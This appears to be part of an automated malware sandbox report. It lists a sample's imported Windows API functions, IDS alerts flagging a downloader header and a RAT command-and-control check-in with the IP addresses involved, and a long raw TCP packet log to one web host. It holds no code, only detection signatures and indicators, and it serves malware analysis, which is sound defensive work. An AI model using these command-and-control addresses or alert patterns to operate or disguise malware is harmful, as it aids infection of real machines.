FileTimeToSystemTime, LocalAlloc, LoadLibraryExW, FreeLibrary, FileTimeToLocalFileTime, SetLastError, CopyFileW, FormatMessageW, MulDiv, LocalFree, GlobalFree, GlobalSize, GetTickCount, GetQueuedCompletionStatus, SetEvent, WideCharToMultiByte, WaitForSingleObject, InterlockedExchange, ResetEvent, RaiseException, PostQueuedCompletionStatus, GetSystemInfo, TerminateThread, GetExitCodeThread, LeaveCriticalSection, EnterCriticalSection, CreateIoCompletionPort, DeleteCriticalSection, CreateEventW, InitializeCriticalSectionAndSpinCount, OutputDebugStringW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetModuleFileNameW, AddVectoredExceptionHandler, CreateMutexW, WriteFile, CreateFileW, FreeResource, GlobalUnlock, GlobalLock, GlobalAlloc, GetLastError, MultiByteToWideChar, FindResourceW, LoadResource, LockResource, SizeofResource, ReadFile, CloseHandle, CreateProcessW, SetHandleInformation, GetConsoleCP
                                        USER32.dllFrameRect, CopyIcon, ReuseDDElParam, UnpackDDElParam, InsertMenuItemW, TranslateAcceleratorW, ModifyMenuW, CharUpperBuffW, RegisterClipboardFormatW, LoadImageW, EmptyClipboard, SetClipboardData, CloseClipboard, OpenClipboard, SetClassLongW, LockWindowUpdate, BringWindowToTop, SetParent, SetCursorPos, DestroyAcceleratorTable, CreateAcceleratorTableW, LoadAcceleratorsW, MapVirtualKeyW, GetKeyboardState, GetKeyboardLayout, ToUnicodeEx, DrawIconEx, DrawFocusRect, DrawFrameControl, DrawEdge, MapDialogRect, SetWindowContextHelpId, SetRect, InvalidateRgn, CopyAcceleratorTableW, CharNextW, DestroyIcon, WaitMessage, CopyImage, MonitorFromPoint, UnionRect, EnableScrollBar, DestroyMenu, IsMenu, IsRectEmpty, SetMenuDefaultItem, GetMenuDefaultItem, GetMenuItemInfoW, CreatePopupMenu, NotifyWinEvent, OffsetRect, WindowFromPoint, MessageBeep, SetWindowRgn, DeleteMenu, GetSystemMenu, LoadMenuW, KillTimer, SetTimer, IsZoomed, TrackMouseEvent, IntersectRect, InflateRect, RealChildWindowFromPoint, SendDlgItemMessageA, UnregisterClassW, EnumDisplayMonitors, SetRectEmpty, CharUpperW, LoadCursorW, GetSysColorBrush, SetCursor, ShowOwnedPopups, TranslateMessage, GetMessageW, PostQuitMessage, SetMenuItemInfoW, GetMenuCheckMarkDimensions, SetMenuItemBitmaps, CheckMenuItem, GetMonitorInfoW, MonitorFromWindow, WinHelpW, GetScrollInfo, SetScrollInfo, GetTopWindow, GetClassLongW, EqualRect, CopyRect, MapWindowPoints, AdjustWindowRectEx, RemovePropW, GetPropW, SetPropW, ShowScrollBar, GetScrollRange, SetScrollRange, GetScrollPos, SetScrollPos, ScrollWindow, RedrawWindow, ValidateRect, GetForegroundWindow, TrackPopupMenu, SetMenu, GetMenu, GetCapture, GetKeyState, IsWindowVisible, EndDeferWindowPos, DeferWindowPos, BeginDeferWindowPos, SetWindowPlacement, GetWindowPlacement, IsChild, CreateWindowExW, GetClassInfoExW, GetClassInfoW, RegisterClassW, CallWindowProcW, DefWindowProcW, GetMessageTime, GetMessagePos, PeekMessageW, DispatchMessageW, IsDialogMessageW, GetWindow, SetWindowLongW, GetWindowTextLengthW, GetWindowTextW, SetWindowTextW, SetFocus, GetDlgCtrlID, CheckDlgButton, SetWindowPos, MoveWindow, ShowWindow, CallNextHookEx, SetWindowsHookExW, PtInRect, GetFocus, GetSysColor, ScreenToClient, ClientToScreen, EndPaint, BeginPaint, ReleaseDC, GetWindowDC, TabbedTextOutW, GrayStringW, DrawTextExW, DrawTextW, GetWindowRgn, GetComboBoxInfo, DestroyCursor, InvertRect, HideCaret, CreateMenu, SubtractRect, GetUpdateRect, IsClipboardFormatAvailable, TranslateMDISysAccel, DefMDIChildProcW, GetLastActivePopup, GetWindowThreadProcessId, DefFrameProcW, DrawMenuBar, MapVirtualKeyExW, GetKeyNameTextW, IsCharLowerW, GetIconInfo, GetDoubleClickTime, GetNextDlgGroupItem, EnableMenuItem, PostThreadMessageW, GetWindowLongW, SetActiveWindow, IsWindowEnabled, GetActiveWindow, GetNextDlgTabItem, GetDlgItem, EndDialog, CreateDialogIndirectParamW, DestroyWindow, UnhookWindowsHookEx, GetClassNameW, FillRect, InvalidateRect, UpdateWindow, DrawStateW, GetDesktopWindow, RemoveMenu, AppendMenuW, InsertMenuW, GetMenuItemCount, GetMenuItemID, GetSubMenu, GetMenuState, GetMenuStringW, PostMessageW, GetParent, GetAsyncKeyState, DrawIcon, GetClientRect, GetSystemMetrics, IsIconic, SetLayeredWindowAttributes, MessageBoxW, SendMessageTimeoutW, RegisterWindowMessageW, EnableWindow, IsWindow, ReleaseCapture, SetCapture, GetCursorPos, SetForegroundWindow, LoadBitmapW, SendMessageW, UpdateLayeredWindow, GetDC, GetWindowRect, LoadIconW, SystemParametersInfoW
                                        GDI32.dllSetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, CreateCompatibleBitmap, CreateDIBitmap, CreateFontIndirectW, CreateRectRgnIndirect, EnumFontFamiliesW, GetTextCharsetInfo, GetTextMetricsW, GetTextExtentPoint32W, CombineRgn, GetMapMode, PatBlt, SetRectRgn, DPtoLP, CreateRoundRectRgn, CreateDIBSection, GetBkColor, GetTextColor, GetRgnBox, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, RealizePalette, SetPixel, StretchBlt, SetDIBColorTable, OffsetRgn, Rectangle, SetViewportOrgEx, CreatePalette, GetPaletteEntries, GetNearestPaletteIndex, GetSystemPaletteEntries, ExtFloodFill, SetPaletteEntries, FillRgn, FrameRgn, GetBoundsRect, PtInRegion, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EnumFontFamiliesExW, SetPixelV, GetTextFaceW, SetTextAlign, SetTextColor, SetViewportExtEx, ExtTextOutW, TextOutW, MoveToEx, RoundRect, CreateCompatibleDC, SetROP2, SetPolyFillMode, GetLayout, SetLayout, SetMapMode, SetBkMode, SetBkColor, SelectPalette, ExtSelectClipRgn, SelectClipRgn, SaveDC, RestoreDC, RectVisible, PtVisible, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetPixel, GetObjectType, GetClipBox, ExcludeClipRect, Escape, DeleteDC, CreateRectRgn, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateBitmap, BitBlt, GetObjectW, GetStockObject, CreateSolidBrush, GetDeviceCaps, CreateDCW, CopyMetaFileW, DeleteObject, SelectObject
                                        MSIMG32.dllAlphaBlend, TransparentBlt
                                        WINSPOOL.DRVDocumentPropertiesW, ClosePrinter, OpenPrinterW
                                        ADVAPI32.dllRegSetValueExW, RegEnumKeyExW, RegEnumValueW, RegQueryValueW, RegEnumKeyW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegQueryValueExW, RegOpenKeyExW
                                        SHELL32.dllDragFinish, SHGetPathFromIDListW, SHGetSpecialFolderLocation, SHBrowseForFolderW, SHGetDesktopFolder, SHGetFileInfoW, ShellExecuteW, SHGetMalloc, DragQueryFileW, SHAppBarMessage
                                        COMCTL32.dllInitCommonControlsEx
                                        SHLWAPI.dllPathFileExistsW, PathFindExtensionW, PathFindFileNameW, PathIsUNCW, PathStripToRootW, StrFormatKBSizeW, PathRemoveFileSpecW
                                        UxTheme.dllOpenThemeData, IsAppThemed, DrawThemeParentBackground, DrawThemeText, GetThemePartSize, IsThemeBackgroundPartiallyTransparent, GetWindowTheme, GetThemeSysColor, GetCurrentThemeName, GetThemeColor, DrawThemeBackground, CloseThemeData
                                        ole32.dllOleInitialize, OleUninitialize, CoFreeUnusedLibraries, DoDragDrop, OleIsCurrentClipboard, OleFlushClipboard, CreateILockBytesOnHGlobal, StgOpenStorageOnILockBytes, StgCreateDocfileOnILockBytes, CoGetClassObject, CreateStreamOnHGlobal, CoInitializeEx, CLSIDFromProgID, CoCreateInstance, CoGetObject, CoTaskMemAlloc, CoTaskMemFree, OleDuplicateData, ReleaseStgMedium, CoUninitialize, CoRegisterMessageFilter, CoRevokeClassObject, RevokeDragDrop, RegisterDragDrop, CoLockObjectExternal, OleGetClipboard, IsAccelerator, OleTranslateAccelerator, OleDestroyMenuDescriptor, OleCreateMenuDescriptor, OleLockRunning, CoCreateGuid, CoInitialize, CoDisconnectObject, CLSIDFromString
                                        OLEAUT32.dllSysAllocString, OleCreateFontIndirect, VarBstrFromDate, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetElemsize, SafeArrayDestroy, SafeArrayCreate, VariantTimeToSystemTime, SystemTimeToVariantTime, SysStringLen, DispCallFunc, LoadRegTypeLib, VariantCopy, VariantChangeType, VariantClear, VariantInit, SysAllocStringLen, SysFreeString, LoadTypeLib
                                        oledlg.dllOleUIBusyW
                                        gdiplus.dllGdipDrawImageI, GdipBitmapUnlockBits, GdipBitmapLockBits, GdipCreateBitmapFromScan0, GdipGetImagePaletteSize, GdipGetImagePalette, GdipGetImagePixelFormat, GdipGetImageGraphicsContext, GdipDrawImageRectI, GdipSetInterpolationMode, GdipDeleteGraphics, GdipCreateFromHDC, GdiplusShutdown, GdiplusStartup, GdipCreateBitmapFromStream, GdipCreateBitmapFromHBITMAP, GdipGetImageWidth, GdipGetImageHeight, GdipCreateHBITMAPFromBitmap, GdipFree, GdipDisposeImage, GdipAlloc, GdipCloneImage
                                        dbghelp.dllMiniDumpWriteDump
                                        WS2_32.dllshutdown, freeaddrinfo, closesocket, connect, socket, getaddrinfo, WSACleanup, WSAStartup
                                        WININET.dllHttpOpenRequestW, InternetSetStatusCallbackW, InternetGetLastResponseInfoW, InternetQueryDataAvailable, InternetWriteFile, InternetSetFilePointer, InternetReadFile, InternetConnectW, InternetCloseHandle, InternetOpenW, HttpSendRequestW, HttpQueryInfoW
                                        OLEACC.dllCreateStdAccessibleObject, AccessibleObjectFromWindow, LresultFromObject
                                        IMM32.dllImmReleaseContext, ImmGetContext, ImmGetOpenStatus
                                        WINMM.dllPlaySoundW
                                        Language of compilation systemCountry where language is spokenMap
                                        ChineseChina
                                        EnglishUnited States
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-09-14T18:31:06.970884+02002803304ETPRO MALWARE Common Downloader Header Pattern HCa3192.168.2.449737172.67.203.19580TCP
                                        2024-09-14T18:31:39.230500+02002052875ET MALWARE Anonymous RAT CnC Checkin1192.168.2.44974045.201.245.15380TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 14, 2024 18:31:06.089025021 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.094407082 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.094646931 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.094753027 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.100435972 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970772982 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970828056 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970864058 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970884085 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.970899105 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970933914 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970967054 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.970968008 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.970968962 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.970968008 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971004963 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971023083 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971023083 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971040010 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971055031 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971075058 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971090078 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971110106 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971144915 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971148014 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971170902 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971206903 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.971268892 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.971329927 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.976165056 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.976254940 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.976283073 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.976345062 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.976403952 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.976464033 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.976778984 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.976845026 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.981093884 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.981128931 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.981206894 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.981244087 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.981271029 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.981338978 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.981714964 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.981777906 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.985847950 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.985882998 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.985933065 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.985970020 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.986578941 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.986625910 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.986649036 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.986658096 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.986685038 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.986711025 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.990720034 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.990756035 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.990809917 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.990907907 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.991375923 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.991425991 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.991456985 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.991491079 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.995549917 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.995584011 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.995630026 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.995675087 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.996102095 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.996135950 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:06.996166945 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:06.996198893 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.000315905 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.000350952 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.000384092 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.000405073 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.000447989 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.000936985 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.000972033 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.001013041 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.001040936 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.005074978 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.005109072 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.005152941 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.005187988 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.005633116 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.005666971 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.005706072 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.005737066 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.009828091 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.009862900 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.009893894 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.009911060 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.009937048 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.009967089 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.010402918 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.010443926 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.010462046 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.010499954 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.014605045 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.014637947 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.014667034 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.014693975 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.015142918 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.015177011 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.015196085 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.015229940 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.019434929 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.019468069 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.019712925 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.019714117 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.019927025 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.019961119 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.019993067 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.020124912 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.020124912 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.020124912 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.024142027 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.024175882 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.024235964 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.024235964 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.024667978 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.024701118 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.024746895 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.024746895 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.028908014 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.028944016 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.028973103 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.029009104 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.029587984 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.029625893 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.029649019 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.029659033 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.029676914 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.029716969 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.033670902 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.033706903 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.034254074 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.034356117 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.034393072 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.034604073 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.034604073 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.038480043 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.038515091 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.038710117 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.038710117 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.039027929 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.039079905 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.039186954 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.039187908 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.043268919 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.043303013 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.043335915 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.043364048 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.043365002 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.043476105 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.043873072 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.043905973 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.043939114 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.043973923 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.048017025 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.048051119 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.048269987 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.048594952 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.048629045 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.048697948 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.052788019 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.052822113 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.052853107 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.053014040 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.053014040 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.053369999 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.053412914 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.053483009 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.057780981 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.057815075 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.057889938 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.058362007 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.058397055 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.058430910 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.058466911 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.062551975 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.062587023 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.062658072 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.063210011 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.063244104 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.063276052 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.063311100 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.063345909 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.067326069 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.067359924 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.067538023 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.068047047 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.068080902 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.068274021 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.072165012 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.072199106 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.072293043 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.072788000 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.072841883 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.072874069 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.072912931 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.072942019 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.076971054 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.077012062 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.077083111 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.077557087 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.077593088 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.077656984 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.081804991 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.081840038 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.082216978 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.082420111 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.082453966 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.082487106 CEST8049737172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.082706928 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.082706928 CEST4973780192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.258198977 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.263317108 CEST8049738172.67.203.195192.168.2.4
                                        Sep 14, 2024 18:31:07.263425112 CEST4973880192.168.2.4172.67.203.195
                                        Sep 14, 2024 18:31:07.263653040 CEST4973880192.168.2.4172.67.203.195
